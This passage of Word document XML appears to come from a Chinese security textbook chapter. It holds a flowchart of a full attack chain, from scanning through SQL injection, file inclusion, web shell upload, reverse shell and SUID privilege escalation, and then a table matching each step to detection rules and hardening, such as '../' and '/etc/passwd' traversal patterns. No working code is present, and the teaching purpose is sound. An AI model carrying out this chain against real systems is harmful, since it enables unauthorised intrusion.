        <w:t xml:space="preserve">flowchart TD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">A["侦察</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reconnaissance)&lt;br/&gt;Nmap SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务枚举&lt;br/&gt;ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TA0043"] --&gt; B["Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集&lt;br/&gt;目录爆破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指纹识别&lt;br/&gt;TA0043"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> B --&gt; C{"Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 1&lt;br/&gt;SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入&lt;br/&gt;TA1190</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit Public-Facing App"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">D["凭据获取&lt;br/&gt;管理员密码哈希&lt;br/&gt;TA1552</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unsecured Credentials"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> C --&gt; E{"Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">突破</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 2&lt;br/&gt;LFI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本地文件包含&lt;br/&gt;TA1190"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> D --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">F["文件上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;br/&gt;Web Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投放&lt;br/&gt;TA1190</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / T1505.003"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> E --&gt; F</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> F --&gt; G["Get Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(初始立足点)&lt;br/&gt;反向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接&lt;br/&gt;TA0011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command &amp; Control"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> G --&gt; H["Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">升级&lt;br/&gt;PTY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">稳定性增强&lt;br/&gt;TA0011"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> H --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">I{"权限提升&lt;br/&gt;SUID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制利用&lt;br/&gt;TA1068</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Priv Esc"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> I --&gt; J["Root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限获取&lt;br/&gt;euid=0"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> J --&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">K["后渗透操作&lt;br/&gt;密码哈希提取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">持久化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集&lt;br/&gt;TA0003</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> / TA0006 / TA0007"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> style A fill:#f9f,stroke:#333,stroke-width:2px</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> style J fill:#fc6,stroke:#333,stroke-width:4px</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> style K fill:#f66,stroke:#333,stroke-width:2px</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> classDef attack fill:#ffebe6,stroke:#ff4d4d;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> class A,B,C,D,E,F,G,H,I,J,K attack;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="398"/>
    <w:bookmarkStart w:id="399" w:name="步骤-防御全对应清单"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.13 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤-防御全对应清单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下表将整个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路中的每一步与其在卷五中的防御措施一一对应。这是本书“攻防对称”教学底线的最终兑现。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Kill-Chain </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ATT&amp;CK </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">战术</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">蓝队检测（卷五）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">蓝队修复/加固（卷五）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">步骤一：Nmap</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TA0043 Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDS/IPS SYN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">扫描检测规则；防火墙日志速率关联告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">主机防火墙连接速率限制；网络分段/最小化暴露面</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">步骤二：目录爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TA0043 Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">日志大量</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 404 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">响应监控；WAF</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">误报权衡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">禁用目录列表（Options</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">-Indexes）；移除</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> robots.txt </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">中的敏感路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">步骤三：SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TA1190 Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WAF/Snort SQLi </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">签名检测；SIEM</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">异常参数长度告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">参数化查询；输入白名单验证；最小权限数据库账户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">步骤四：LFI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TA1190 Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WAF </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">目录遍历特征（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">../</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">）检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">白名单文件包含；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">open_basedir</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">限制；禁用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allow_url_include</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">步骤五：文件上传</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1505.003 Web Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">监控可执行代码上传；FIM</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">检测</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">目录新文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">上传文件类型白名单；存储隔离+禁止上传目录执行权限；恶意代码扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">步骤六/七：反向</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Shell </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">与升级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">TA0011 C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">出站连接监控（非</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Web </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端口出站流量）；Netflow</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">出站防火墙策略白名单（仅允许必要出站端口）；网络分段限制出站连接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">步骤八：SUID</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">提权</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1068 Exploit for Priv Esc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Auditd </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">监控</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SUID </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">二进制执行；进程链异常检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
